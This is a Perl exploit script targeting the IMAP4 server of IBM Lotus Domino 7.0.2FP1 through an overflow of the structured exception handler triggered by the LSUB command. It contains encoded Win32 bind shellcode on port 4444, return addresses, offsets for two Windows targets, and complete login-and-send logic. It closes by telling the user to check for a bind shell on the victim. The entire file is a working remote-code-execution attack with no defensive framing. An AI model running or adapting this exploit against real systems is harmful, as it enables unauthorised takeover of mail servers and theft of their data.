#!perl # # "IBM Lotus Domino" IMAP4 Server 'LSUB' Command Exploit # # Author: Manuel Santamarina Suarez # e-Mail: FistFuXXer@gmx.de # use IO::Socket; use File::Basename; # # destination TCP port # $port = 143; # # SE handler # # You can only use HEX values from 0x20 to 0x7e! (printable ASCII characters) # You must use a POP/POP/RET sequence that doesn't modify the ESP register or # the shellcode decoder will fail. # $seh = reverse( "\x60\x21\x53\x4E" ); # POP EDI/POP EBP/RET # nnotes.6021534e # universal on Lotus Domino 7.0.2FP1 # # Shellcode # You can only use HEX values from 0x20 to 0x7e! (printable ASCII characters) # # 1. Step: Modified Win32 Bind Shellcode (EXITFUNC=thread, LPORT=4444) # 2. Step: Encoded with Alpha 2.0 (BASEADDRESS=ESP) # $sc = "TYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIeyZiMSKYnPYI". "JNJy0tGTydqKOqcCDS2wDWLMnzmSxkYlkRYdLksMRFhWoOZNbRe5mxBWuVHvqcFS". "7vIORKmLzQmOToWf3RvqWhTOUViUD7Wfqvn3yLusEVmKMiuvBmuSkKNsrmzNpPhV". "bgOgpVIEsVRNpl2cOYnRDbl26fJePsR6cVkLKlUKO6TQWx6kLLpqRtGKVftSekP3". "OaKKlTgVV6KNyLqDoMtQB75KWvJJ0KoJGvzzSog9M5ftwiwisQkzMxiQXkyYDqqo". "ONy8uocPKNMxUX2crRPJWOKlsPavRLQWQbPLs8MNphKLZvXznenx5RamlOQumWQo". "btLSI2OJYJe5mQ0DyNyY7tctxNJiR4pDcBpJUaCOmLo6uaPDVdcKyRSOUyOpewzp". "ZzPeMQSMmMZkdBkXaMZRl3lzLcBSUPM8skzitBixQMibMbaNfkXSWp9xSkzjUSRc". "hX2EMWOt8eQmdn8QJTHMNHIQKhpemWRQYwkNvQSOXnL7yN9bXgiZfnGNQQUClp3M". "HIECH5WVPM59KMkYZolwliSeoQwyJzBMH5FQYlMlJEHhLiLdOkQu5rpS2RrltL70". "YO8KFfqVm7mKtFcvxXzkoXKwxe6WLNuB3sYYY8kqm73UlhEp0rQZKl1PbQDYOcPs". "RRRlfem8aMibLxKi0mij5TKXQKcUk76wlMLZA"; # # JUMP to 'ESP adjustment' and shellcode # $jmp = "\x74\x20". # JE SHORT "\x75\x20"; # JNZ SHORT # # # Don't edit anything after this line # # $sc_limit = 2300; sub usage { print "Usage: " . basename( $0 ) . " [target] [IPv4 address] [username] [password]\n". "Example: ". basename( $0 ) . " 1 192.168.1.19 \"Bill Gates/ServerName\" \"P4ssw0rd\"\n". "\n". "Targets:\n". "[1] Lotus Domino 7.0.2FP1 on Windows Server 2000 SP4\n". "[2] Lotus Domino 7.0.2FP1 on Windows Server 2003 SP2\n"; exit; } # Net::IP::ip_is_ipv4 sub ip_is_ipv4 { my $ip = shift; unless ($ip =~ m/^[\d\.]+$/) { return 0; } if ($ip =~ m/^\./) { return 0; } if ($ip =~ m/\.$/) { return 0; } if ($ip =~ m/^(\d+)$/ and $1 < 256) { return 1 } my $n = ($ip =~ tr/\./\./); unless ($n >= 0 and $n < 4) { return 0; } if ($ip =~ m/\.\./) { return 0; } foreach (split /\./, $ip) { unless ($_ >= 0 and $_ < 256) { return 0; } } return 1; } print "--------------------------------------------------------\n". ' "IBM Lotus Domino" IMAP4 Server \'LSUB\' Command Exploit'."\n". "--------------------------------------------------------\n\n"; if( ($#ARGV+1) != 4 ) { &usage; } $user = $ARGV[2]; $pass = $ARGV[3]; # Windows 2000 SP4 if( $ARGV[0] == 1 ) { $popad = "\x41" x 3 . # INC ECX "\x61" x 51; # POPAD } # Windows 2003 SP2 elsif( $ARGV[0] == 2 ) { $popad = "\x41" x 2 . # INC ECX "\x61" x 52; # POPAD } else { &usage; } if( ip_is_ipv4( $ARGV[1] ) ) { $ip = $ARGV[1]; } else { &usage; } if( length( $sc ) > $sc_limit ) { print "[-] Error: Shellcode's size exceeds $sc_limit bytes!\n"; exit; } print "[+] Connecting to $ip:$port...\n"; $sock = IO::Socket::INET->new ( PeerAddr => $ip, PeerPort => $port, Proto => 'tcp', Timeout => 2 ) or print "[-] Error: Couldn't establish a connection to $ip:$port!\n" and exit; print "[+] Connected.\n"; $mailbox = "\x44" x 280 . $jmp . $seh . "\x44" x 26 . $popad . $sc . "\x44" x 3000; $sock->recv( $recv, 1024 ); $sock->send( "a001 LOGIN \"$user\" \"$pass\"\r\n" ); $sock->recv( $recv, 1024 ); if( $recv ne "a001 OK LOGIN completed\r\n" ) { print "[-] Error: Invalid username or password!\n"; exit; } print "[+] Successfully logged in.\n". "[+] Trying to overwrite and control the SE handler...\n"; $sock->send( "a002 SUBSCRIBE {" . length( $mailbox ) . "}\r\n" ); $sock->recv( $recv, 1024 ); $sock->send( "$mailbox\r\n" ); $sock->recv( $recv, 1024 ); $sock->send( "a003 LSUB arg1 arg2\r\n" ); sleep( 3 ); close( $sock ); print "[+] Done. Now check for a bind shell on $ip:4444!\n";